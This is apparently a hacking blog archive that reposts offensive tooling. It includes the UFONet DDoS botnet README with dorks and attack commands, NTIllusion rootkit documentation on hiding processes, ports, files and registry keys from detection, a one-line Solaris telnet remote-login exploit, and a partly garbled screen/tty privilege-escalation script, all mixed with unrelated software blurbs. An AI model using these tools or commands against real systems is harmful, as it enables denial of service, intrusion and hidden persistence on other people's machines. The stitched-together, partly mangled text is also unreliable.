Wednesday, May 31, 2017

   
 ====================================================================== 
  UFONet - DDoS Botnet via Web Abuse 
======================================================================
"oderint dum metuant"

News:


Introduction:

Up to menu
UFONet - is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet. + See this links for more info: - CWE-601:Open Redirect - OWASP:URL Redirector Abuse

UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.

[!]Remember: this tool is NOT for educational purpose.

Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Media:

Up to menu
* VIDEO: UFONet v0.7 "Big Crunch!" (OLD VersioN!)
* Shell: Banner [ +Zoom ]
UFONet U-NATi0n!
* Shell: Tango Down! [ +Zoom ]
UFONet U-NATi0n!
* GUI: Banner [ +Zoom ]
UFONet U-NATi0n!
* GUI: Mothership [ +Zoom ]
UFONet U-NATi0n!
* GUI: GlobalMap Deploying Botnet [ +Zoom ]
UFONet U-NATi0n!
* GUI: Attack Visor [ +Zoom ]
UFONet U-NATi0n!
* GUI: GlobalMap Botnet Attack [ +Zoom ]
UFONet U-NATi0n!
* VIDEO: UFONet v0.6 "Galactic OFFensive" (OLD version!)

Packages:

Up to menu
Current version: v0.8 - 'U-NATi0n!'

git clone https://github.com/epsylon/ufonet

+ Packages: - UFONet-v0.8(.zip) (md5:94cd82d3934999e7651cdebfa8065323) - torrent - UFONet-v0.8(.tar.gz) (md5:c796c9f0efb2d1d816891d16f40feb04) - torrent -------------------------------- + Previous: - UFONet-v0.7(.zip) (md5:77af04023893d71f34e12a424247a0dd) - torrent - UFONet-v0.7(.tar.gz) (md5:5f4656a8e0a75a8483c3d425e86cca4b) - torrent - UFONet-v0.6(.zip) (md5:f6be802f76e40b7dfd06075bfc616e39) - torrent - UFONet-v0.6(.tar.gz) (md5:40ca8242475a72dc99c139309fe9055c) - torrent - UFONet-v0.5b(.tar.gz) (md5:775f13baefb9241142c377f8519506f7)

FAQ:

Up to menu
If you have problems with UFONet, try to solve them following next links: - Website FAQ section - UFONet GitHub issues

Installation:

Up to menu
UFONet runs on many platforms. It requires Python (>2.7.9) and the following libraries: python-pycurl - Python bindings to libcurl python-geoip - Python bindings for the GeoIP IP-to-country resolver library python-crypto - Cryptographic algorithms and protocols for Python On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl python-geoip python-crypto On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run: pip install geoip pip install requests pip install pycrypto Source libs: * Python | * PyCurl | * PyGeoIP | * PyCrypto

Usage:

Up to menu
UFONet.py [options] Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --update check for latest stable version --check-tor check to see if Tor is used properly --force-yes set 'YES' to all questions --gui run GUI (UFONet Web Interface) *Tools*: --crypter Encrypt/Decrypt messages using AES256+HMAC-SHA1 *Configure Request(s)*: --proxy=PROXY Use proxy server (tor: 'http://127.0.0.1:8118') --user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED) --referer=REFERER Use another HTTP Referer header (default SPOOFED) --host=HOST Use another HTTP Host header (default NONE) --xforw Set your HTTP X-Forwarded-For with random IP values --xclient Set your HTTP X-Client-IP with random IP values --timeout=TIMEOUT Select your timeout (default 10) --retries=RETRIES Retries when the connection timeouts (default 1) --threads=THREADS Maximum number of concurrent HTTP requests (default 5) --delay=DELAY Delay in seconds between each HTTP request (default 0) *Search for 'Zombies'*: -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=') --sd=DORKS Search from 'dorks' file (ex: --sd 'botnet/dorks.txt') --sn=NUM_RESULTS Set max number of results for engine (default 10) --se=ENGINE Search engine to use for 'dorking' (default: bing) --sa Search massively using all search engines *Test Botnet*: -t TEST Update 'zombies' status (ex: -t 'botnet/zombies.txt') --attack-me Order 'zombies' to attack you (NAT required!) --test-rpc Update 'xml-rpc' reflectors status *Community*: --download-zombies Download 'zombies' from Community 'blackhole' --upload-zombies Upload your 'zombies' to Community 'blackhole' --blackhole Create a 'blackhole' to share your 'zombies' --up-to=UPIP Upload your 'zombies' to a 'blackhole' --down-from=DIP Download your 'zombies' from a 'blackhole' *Research Target*: -i INSPECT Search biggest file (ex: -i 'http(s)://target.com') *Configure Attack(s)*: --no-head Disable status check: 'Is target up?' --no-aliens Disable 'aliens' web abuse --no-droids Disable 'droids' redirectors --no-ucavs Disable 'ucavs' checkers --no-rpcs Disable 'xml-rpcs' reflectors -r ROUNDS Set number of rounds (default: 1) -b PLACE Set place to attack (ex: -b '/path/big.jpg') -a TARGET Start Web DDoS attack (ex: -a 'http(s)://target.com') *Special Attack(s)*: --db=DBSTRESS Set db stress input point (ex: --db 'search.php?q=')

Examples:

Up to menu
  • Searching for 'zombies':
  UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites. 
  A common query string should be like this:

        'proxy.php?url='
        'check.cgi?url='
        'checklink?uri='
        'validator?uri='

  For example you can begin a search with:

       ./ufonet -s 'proxy.php?url='

  Or providing a list of "dorks" from a file:

       ./ufonet --sd 'botnet/dorks.txt'

  By default UFONet will uses a search engine called 'bing'. But you can choose a different one:

       ./ufonet -s 'proxy.php?url=' --se 'bing'

  This is the list of available search engines with last time that were working:

        - bing [17/08/2016: OK!]
        - yahoo [17/08/2016: OK!]

  You can also search massively using all search engines supported:

       ./ufonet -s 'proxy.php?url=' --sa 

  To control how many 'zombies' recieve from search engines you can use:

       ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20

  At the end of the process, you will be asked if you want to check the list retrieved to see 
  if the urls are vulnerable.

       Wanna check if they are valid zombies? (Y/n)

  Also, you will be asked to update the list adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y' your new 'zombies' will be appended to the file named: zombies.txt

  -------------
  Examples:

     + with verbose:     ./ufonet -s 'proxy.php?url=' -v
     + with threads:     ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100


  • Testing botnet:
  Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. 
  Urls of the 'zombies' should be like this:

       http://target.com/check?uri=

  After that, launch it:

       ./ufonet -t 'botnet/zombies.txt'

  You can order to 'zombies' to attack you and see how they reply to your needs using:

       ./ufonet --attack-me 

  At the end of the process you will be asked if you want to update the list 
  adding automatically only 'vulnerable' web apps.

       Wanna update your list (Y/n)

  If you reply 'Y', your file: zombies.txt will be updated.

  -------------
  Examples:

     + with verbose:     ./ufonet -t 'botnet/zombies.txt' -v
     + with proxy TOR:   ./ufonet -t 'botnet/zombies.txt' --proxy="http://127.0.0.1:8118"
     + with threads:     ./ufonet -t 'botnet/zombies.txt' --threads 50


  • Inspecting a target:
  This feature will provide you the biggest file on target:

       ./ufonet -i http://target.com

  You can use this when attacking to be more effective:

       ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

  -------------
  Example:

    +input:

       ./ufonet -i http://target.com

    +output:

       [...]

        +Image found: images/wizard.jpg
 (Size: 63798 Bytes)
 ------------
 +Style (.css) found: fonts.css
 (Size: 20448 Bytes)
 ------------
 +Webpage (.php) found: contact.php
 (Size: 2483 Bytes)
 ------------
 +Webpage (.php) found: about.php
 (Size: 1945 Bytes)
 ------------
 +Webpage (.php) found: license.php
 (Size: 1996 Bytes)
 ------------
 ================================================================================
 =Biggest File: http://target.com/images/wizard.jpg
 ================================================================================


  • Attacking a target:
  Enter a target to attack with a number of rounds:

       ./ufonet -a http://target.com -r 10

  On this example UFONet will attacks the target a number of 10 times for each 'zombie'. That means that 
  if you have a list of 1.000 'zombies' it will launchs 1.000 'zombies' x 10 rounds = 10.000 requests 
  to the target.

  By default if you don't put any round it will apply only 1.

  Additionally, you can choose a place to recharge on target's site. For example, a large image, 
  a big size file or a flash movie. In some scenarios where targets doesn't use cache systems 
  this will do the attack more effective.

       ./ufonet -a http://target.com -b "/images/big_size_image.jpg"

  -------------
  Examples:

     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
     + with threads:     ./ufonet -a http://target.com -r 10 --threads 500


  • Special attacks:
  UFONet uses different ways to exploit 'Open Redirect' vulnerabilities. For example:

  You can use UFONet to stress database on target by requesting random valid strings like search queries:

     ./ufonet -a http://target.com --db "search.php?q="

  Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests
  and increasing processing required by target.

  You can test your list of 'X-RPCs zombies' by launching:

     ./ufonet --test-rpc


  • Updating:
  UFONet implements an option to update the tool to the latest stable version.
  This feature can be used only if you have cloned it from GitHub repository

  To check your version you should launch:

       ./ufonet --update

  This will update the tool automatically, removing all files from your old package.


  • GUI/Web Interface:
  You can manage UFONet using a Web interface. The tool has implemented a python web server
  connected to the core, to provides you a more user friendly experience.

  To launch it, use:

      ./ufonet --gui

  This will open a tab on your default browser with all features of the tool and some 'extra' options. ;-)

  Ex: UFONet 'CryptoNews' [ +Zoom ]
UFONet U-NATi0n!

  • Generating 'Blackhole':
  UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
      
  * Setup web server with a folder "ufonet", this folder should be: 

    - located in /var/www/ufonet (default debian/ubuntu install)
    - owned by the user running the blackhole
    - accessible with http://your-ip/ufonet/

  * Start the blackhole with: ./ufonet --blackhole (or python2 blackhole.py)

  * Anyone wanting to connect to your server needs to set the --up-to/--down-from 
    to the ip address of your webserver...

  [!]WARNING : this *ADVANCED* function is *NOT* secure, proceed if you really want to.

  -------------
  Examples:

   + Starting 'blackhole' server: ./ufonet --blackhole

  

 

License:

Up to menu
UFONet is released under the terms of the General Public License v3 and is copyrighted by psy.

Support:

Up to menu
If you want to contribute to UFONet development, reporting a bug, providing a patch, commenting on the code base or simply need to find help to run it, please go to: + Wormhole: irc.freenode.net / channel: #ufonet If nobody gets back to you, then drop me an e-mail. To make donations use the following hash: - Bitcoin: 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw

https://ufonet.03c8.net/

Tuesday, May 30, 2017

Reset administrator password of Windows 10 without any software??

Hack windows vista/7/8/8.1 Login Password without third party application

Exploit found on Windows Vista, 7, 8, 8.1 - Registry Hack for Login Screen

Sections named databefore, datainject, and dataafter made the web injections themselves look similar to the widespread Zeus malware (there may have been a connection between this and the 2011 Zeus source code leak). Cridex 0.77–0.80

DO YOU KNOW WHAT A ROOTKIT IS??? CHECK THIS ONE:

I/ Features (*) :
 -------------
 ---------------------------------------------------------------------------
 o TCP    - coder -  - hooked api(s) -
 ---------------------------------------------------------------------------
 - defeats netstat   (windows)  CharToOembufA
 - defeats aports   (ntutility.com)  AllocAndGetTCPExTableFromStack
 - defeats fport    (foundstone)  AllocAndGetTCPExTableFromStack
** - disables tcpview   (sysinternals)  AllocAndGetTCPExTableFromStack
         & whole program disabled
 - defeats any program that rely directly (or by using GetProcAddress) on 
   AllocAndGetTCPExTableFromStack
 ---------------------------------------------------------------------------
 o FILES
 ---------------------------------------------------------------------------
 - defeats explorer   (windows)  FindFirst/NextFileA/W
 - defeats cmd's dir   (windows)  WriteConsoleW(/A)
 - defeats any program that rely directly (or by using GetProcAddress) on 
   FindFirst/NextFileA/W
 ---------------------------------------------------------------------------
 o PROCESSES
 ---------------------------------------------------------------------------
 - defeats taskmanager   (windows)  NtQuerySystemInformation
 - disables Process Explorer  (sysinternals)  NtQuerySystemInformation
 - defeats any program that rely directly (or by using GetProcAddress) on 
   NtQuerySystemInformation
 ---------------------------------------------------------------------------
 o REGISTRY
 ---------------------------------------------------------------------------
 - defeats regedit   (windows)  RegEnumValue
 - defeats any program that rely directly (or by using GetProcAddress) on 
   RegEnumValue
 ---------------------------------------------------------------------------
 
 Notes :
 -------
 * Any process whose executable name or command line contains RTK_FILE_CHAR 
 will not be hijacked (backdoor)
 II/ Details :
 -------------
 <------------->
 C:\>kNTIllusionLoader.exe kNTIllusion.dll
 Running NTIllusion Rootkit Loader v 0.1 by Kdm (kodmaker@netcourrier.com)

 OK
 C:\>
 Debug View : 
 - Rootkit injected into 'c:\windows\explorer.exe', fixing modules...
 ...
 - # Hooked CreateProcessW :  - "C:\aports.exe" , injecting rootkit 
   (c:\kntillusion.dll)...
 - Rootkit injected into 'c:\aports.exe', fixing modules...
 - Spreading across userland : injected into 'c:\aports.exe', fixing modules...
 - 'c:\aports.exe' : all modules reviewed.
 


   ---------------------------------------------------------------------------
 o TCP
 ---------------------------------------------------------------------------
 NTIllusion hooks AllocAndGetTCPExTableFromStack to make programs hide some 
 (strategic ? :]) tcp ports. These "hidden ports" belong to range from 
 RTK_PORT_HIDE_MIN to RTK_PORT_HIDE_MAX. This is done by hijacking 
 AllocAndGetTCPExTableFromStack for all programs (NT latests versions) and
 CharToOembufA (netstat output).
 = Demo =
 C:\>nc -lp 56788
 C:\>netstat -an
 Debug View : [!] NTIllusion made a port hidden (5678* range)
 C:\>aports.exe
 Debug View : [!] NTIllusion made a TCP socket hidden for process nc.exe (1884)
 ---------------------------------------------------------------------------

  ---------------------------------------------------------------------------
 o PROCESS
 ---------------------------------------------------------------------------
 NTIllusion hooks NtQuerySystemInformation to make programs hide some 
 (strategic ? :]) process. So all process whose file name starts by 
 RTK_PROCESS_CHAR will be hidden.
 = Demo =
 C:\>_ntibackdoor.exe
 Debug View : [!] NTIllusion made the process '_ntibackdoor.exe' hidden.
 Note : the SendMessageW hook for taskmgr.exe is available for test purpose.
 ---------------------------------------------------------------------------

   ---------------------------------------------------------------------------
 o FILES
 ---------------------------------------------------------------------------
 NTIllusion hooks FindFirstFileA/W, FindNextFileA/W to make programs hide 
 some (strategic ? :]) files. Contrary to the registry hook engine, a hidden
 file with a prefix that sits in a lower position than an other file's one
 in ASCII table won't prevent them from being shown. So a hidden file named
 abcd.exe won't hide bcde.exe and so on. All files whose name start by 
 RTK_FILE_CHAR will be hidden.
 = Demo =
 echo rootkitloaded > c:\_ntimsg.txt
 C:\>dir c:\*.*
 Debug View : [!] NTIllusion made the file : '_ntimsg.txt' invisible.
 Browse to c:\ :
 Debug View : [!] NTIllusion made the file : '_ntimsg.txt' invisible.
 ---------------------------------------------------------------------------

 ---------------------------------------------------------------------------
 o REGISTRY
 ---------------------------------------------------------------------------
 NTIllusion hooks regedit to make it hide some (strategic ? :]) registry keys.
 Regedit won't see all keys starting by string RTK_REG_CHAR (_nti by default).
 Indeed, we return a value that means the end of the keys list. That's why you
 must be prudent when choosing RTK_REG_CHAR because a too global prefix will
 also hide normal keys and may bring the user suspicion.
 = Examples =
 - Bad prefix : using _ char as rootkit's tag could hide other keys whose 
 first char's ascii code is greater than _ one, since keys are retrieved in 
 lexicographic order by default.
 - Correct prefix : using char © prevent us the effort of returning the next
 correct key (if it exists) since registry key names are most of the time
 composed of alphanumeric tokens.
 = Demo =
 C:\>regedit.exe
 Debug View : [!] NTIllusion made the key '_ntiKdm' (and all subsequent keys)
 hidden.
 ---------------------------------------------------------------------------
    
 III/ Comments :
 ---------------
 - fixed debug output function : rootkit now sends a whole string instead of 
   unformatted parts
 - you can solve self tcp scan (instead of netsat) problem by using a
   reverse connection backdoor
 - beware : dll may be revealed by Sygate personal firewall that contains
   a dll injection couterfighting mechanism. So name this dll properly !
   (ie not backdoor.dll ... but system.dll) 

 IV/ Todo :
 ----------
 - port NT ILLUSION to win 9x (yes, it's possible)
 - hijack LoadLibraryW & CreateProcessA
 - code a routine that scans all process from explorer's process and try to
   inject them (this will inject console programs launched before the rootkit
   is loaded or graphic process not brought to foreground but able to reveal
   us: for example, ftp servers)) by using no privilege, then the 
   SeDebugPrivilege (if possible)
 *****************************************************************************/

https://github.com/bowlofstew/rootkit.com/tree/master/kdm/NTIllusion

Free software serial port monitor, Com Rs232 sniffer with communication packet data analyzer. This monitoring utility can spy, capture, view, analyze, test com ports activity performing com port connection and traffic analysis with data acquisition and control. You can use this system as device interface testing tool, modem data transfer viewer and so on. Serial Monitor can be successfully used for monitoring data flow between serial devices and Windows application, debugging com port connections, developing, reverse-engineering and implementing serial protocol, serial device driver development, serial hardware development, research the functionality of any third-party software and hardware, testing software and hardware. Free Serial Port Monitor can be successfully used by programmers, beta-testers, software developers, hardware engineers, IT support specialists, industrial control personnel, SCADA software engineers, science technicians, systems integrators, consultants, lab experts, University students.

Free Serial Port Monitor 3.31 - Free Serial Port Monitor, RS232 Com Software Sniffer and Communication Analyzer

http://www.softrecipe.com/Software-Development/Others/free_serial_port_monitor.html

Monday, May 29, 2017

Trivial remote Solaris 0day, disable telnet now.

Oh jeez, that’s not good. This was posted to Full-Disclosure. Remote root exploit in the Solaris 10/11 telnet daemon. It doesn’t require any skill, any exploit knowledge, and can be scripted for mass attacks. Basically if you pass a “-fusername” as an argument to the –l option you get full access to the OS as the user specified. In my example I do it as bin but it worked for regular users, just not for root. This combined with a reliable local privilege escalation exploit would be devastating. Expect mass scanning and possibly the widespread exploitation of this vulnerability.

And example of the command line is

telnet -l "-fbin" target_address

Please disable telnet on Solaris at this time. The HEV for this will be shipping to ErrataSec customers within the hour.



UPDATE: There seems to be some conflicting reports about this vulnerability working with the root account. This does not work on a default install of Solaris 10. By default a variable is set in /etc/default/login called CONSOLE. If this variable is set then root is not allowed to login from anywhere but the console. Commenting this variable out allows root to login from anywhere and allows this vulnerability to take advantage of the telnet exploit. Below is a pic of my trying it with console set then with console commented out.


http://blog.erratasec.com/2007/02/trivial-remote-solaris-0day-disable.html#.WSxAPOvyuds

NetworkBlockDevice/nbd code bug

DoD

**DO NOT DISTRIBUTE**
#

SCREEN=/usr/bin/screen
umask 0

if [ ! -x $SCREEN ]; then
  echo "I can't execute $SCREEN..."
  exit 0
fi

LINK=`echo $HOME|awk '{print $1 " "}'`.pts-00.dupa

if [ -f "$LINK" ]; then
  echo "DAMN. I don't have usable pts socket available..."
  exit 0
fi

echo -ne "Finding root owned tty...\t\t"
unset TTY

for x in /dev/tty[0-9]* /dev/pts/? /dev/pts?? ; do
  if [ "`ls -ln $x|awk {'print $3'}`" = "0" ]; then
     TTY="$x"
     break
  fi
done

echo -n "$TTY"

if [ "$TTY" = "" ]; then
  echo -e "\nI can't find a root owned tty!"
  exit 0
fi

if [ ! -w $HOME -o ! -w /tmp ]; then
  echo -e "\nI can't write $HOME/.screenrc or to /tmp..."
  exit 0
fi

cat >$HOME/.screenrc <<_eof_ -aa="" -c="" -d="" -m="" -ne="" -q="" -s="" 00="" 100="" _eof_="" amp="" autodetach="" defscrollback="" defsocketpath="" echo="" hs:ts="\E_:fs=\E\\:ds=\E_\E\\" nstarting="" on="" screen...="" screenrc="" t="" termcapinfo="" vbell="">/dev/null &
SCPID=`echo $!`

echo -n "PID: $SCPID"

while :; do
  sleep 1
  if [ "$#" -ge "0" ]; then
    break
  fi
done

cd /tmp
ln -fs $LINK $HOME/ &>/dev/null
echo -ne "\nWaiting for socket to be created...\t"

CNT=5   # Timeout
while [ "$CNT" -gt "0" -a ! -f "$LINK" ]; do
  let CNT=$CNT-1
  sleep 1
done
echo -n "Done."

echo -ne "\nLinking to root owned terminal...\t\t"
ln -fs $TTY $LINK &>/dev/null

echo -ne "\nComplete. Now do \"$SCREEN -r 00\".\nCleaning up..."

$SCREEN -wipe &>/dev/null &
rm -fr $HOME/.screenrc $LINK &>/dev/null

echo -ne "\rComplete.\n"

exit 1
[END_CUT] screen.sh


RSAREF is a cryptographic toolkit designed to facilitate rapid deployment of Internet Privacy-Enhanced Mail (PEM) implementations. RSAREF represents the fruits of RSA Data Security's commitment to the U.S. Department of Defense's Advanced Research Projects Agency (DARPA) to provide free cryptographic source code in support of a PEM standard. RSA Laboratories offers RSAREF in expectation of PEM's forthcoming publication as an Internet standard.